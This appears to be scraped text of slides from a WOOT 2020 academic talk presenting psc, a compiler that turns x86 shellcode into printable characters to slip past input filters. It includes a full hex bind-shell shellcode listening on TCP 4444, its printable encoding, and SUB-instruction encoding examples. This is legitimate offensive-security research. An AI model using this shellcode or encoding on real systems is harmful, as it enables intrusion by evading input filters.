Upload
others
View
6
Download
0
Embed Size (px)
Citation preview
Automatic Generation ofCompact Printable Shellcodes For x86WOOT ’20
Dhrumil PatelAditya BasuAnish Mathuria
August 11, 2020
Outline
IntroductionCurrently used AlgorithmsMotivationPrintable Shellcode Compiler (psc)ResultsConclusion
Printable Shellcodes
Defensive filters strip all the printable characters from input.This ruins most injection attacks.
Attacker’s Goal is to generate code that consists only of:0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!\"#$%&\’()*+,-./:;?@[\\]^_‘{|}~
Currently Used AlgorithmsRiley Eller Algorithm“Any dword (4 bytes) can be derived from twoor three SUB instructions whose operands areprintable bytes”
Available as a Metasploit plugin
Ex. 0x89e3cd80 bytes from execv /bin/shshellcode
# Constants are printable (0x21-0x7E)sub $0x256d6d2d, %eaxsub $0x256d6d25, %eaxsub $0x34574225, %eaxpush %eax
Each byte is encoded with > 2.5 bytes
Source to Source ConversionGeczi and Ivanyi replace allnon-printable instructions with asequence of printableinstruction(s)
38 byte shellcode→ 9837 bytesprintable shellcode
Not publicly available
We Need Compact Shellcodes
Transforming to printable⇒ increases shellcode sizeSize restrictions on input
ExampleBu�er overflow exploits are limited by the bu�er size.
Printable Shellcode Compiler
OverviewEncoding SchemeRuntime DecoderTesting
psc: Printable Shellcode Compiler
Arbitrary shellcode→ Printable shellcodeSpecial encoding schemeHand-crafted decoder that is printable
Printableshellcode
Encodedpayload
Printableshellcode
Encodedshellcode
CustomXOR
Patcher
Decoderloop(size=73bytes) Encodedpayload
Printableshellcode
EncodedshellcodeDecoder(size=146bytes)
psc Encoding Scheme
b2b0 b3b10 0 00
0 b80 b9b5 b6 b7b4
b100 b110 b13 b14 b15b12
b10b8 b11b9 b13 b14 b15b12
Original Byte #2
Encoded B1 = 0x3F +
Encoded B2 = 0x3F +
Encoded B3 = 0x3F +
Encoded Range = 0x3F − 0x7E
b2b0 b3b1 b5 b6 b7b4
Original Byte #1
Range of EncodedBytes‖
(0x3F,0x7E)
psc Runtime Decoding
ECX:ReadPointerEDX:WritePointer
Initializer
B1=0x26
Recoverfirstbyte,R1← (B1>2
Recoversecondbyte,R2← (B2
Testing
CustomXOR
Patcher
Decoderloop(size=73bytes) Encodedpayload
EncodedshellcodeDecoder
SIGTERM
ForTesting
Signal handler checksRecovered Shellcode == Original Shellcode
psc In Action
Shellcode to spawn shell on 4444/TCP
\x31\xc0\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x97\x31\xc0\x43\x50\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xb0\x66\xcd\x80\x50\x57\x89\xe1\xb0\x66\x83\xc3\x02\xcd\x80\x50\x50\x57\x89\xe1\x04\x66\x43\xcd\x80\x93\x31\xc0\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x66\x68\x73\x68\x68\x2f\x2f\x62\x61\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
binary to
printable
‘PYj0X40HP[j0X0Y50AO0YO0Y‘0Aa0Ya0Ab0Yi0Aj0Yj0Ak0Ym0YnrII0Y70A80Y80A90Y=0Y>0YGQZOyI&t
Results
Encoding PerformanceTotal Output Size
Results: Only Encoded Shellcode
0 500 1000 1500 2000
execve /bin/sh
add root user
copy /etc/passwd
shell on 4444/TCP
download file & execute
HTTP Server on 8800/TCP
shell on 8080/TCP over SSL
bytes
Encoding Performance
Original
Riley Eller
psc
psc encoding is morecompact than Riley Elleralgorithm
Results: Decoder & Encoded Shellcode
0 500 1000 1500 2000
execve /bin/sh
add root user
copy /etc/passwd
shell on 4444/TCP
download file & execute
HTTP Server on 8800/TCP
shell on 8080/TCP over SSL
bytes
Total Output Size
Original
Riley Eller
psc
For large shellcodes, pscbeats the Riley Elleralgorithm
psc vs ALPHA3
psc encoding outperforms ALPHA3.ALPHA3 changes 1 byte→ 2 bytespsc changes 1 byte→ 1.5 bytes
However, the compact encoding makes our decoder complicated.
psc beats ALPHA3 for larger shellcodes (size > 236 bytes).
Concluding Remarks
We present a new encoding algorithm that uses looped decoding toreduce the size of the auto-generated printable shellcodes.
We produce about 40%− 50% smaller printable shellcodes as comparedto the Riley Eller algorithm.
Future PlanAdd support for x86_64 shellcodes
References
Riley EllerBypassing MSB Data Filters forBuffer Overflow Exploits on Intel Platformshttp://julianor.tripod.com/bc/bypass-msb.txt.
Zsolt Géczi and Peter Iványi (2018)Automatic translation of assembly shellcodesto printable byte codesPollack Periodica 13(04), 3–20.
B.J. WeverALPHA3https://github.com/SkyLined/alpha3.
http://julianor.tripod.com/bc/bypass-msb.txthttps://github.com/SkyLined/alpha3
Thanks!Dhrumil PatelDevops at Acko Technology and Services Private [email protected]
Aditya BasuPhD Student at Penn [email protected]
Anish MathuriaProfessor at [email protected]
[email protected]@[email protected]
Printable Shellcode CompilerOverview Encoding Scheme Runtime Decoder Testing
ResultsEncoding Performance Total Output Size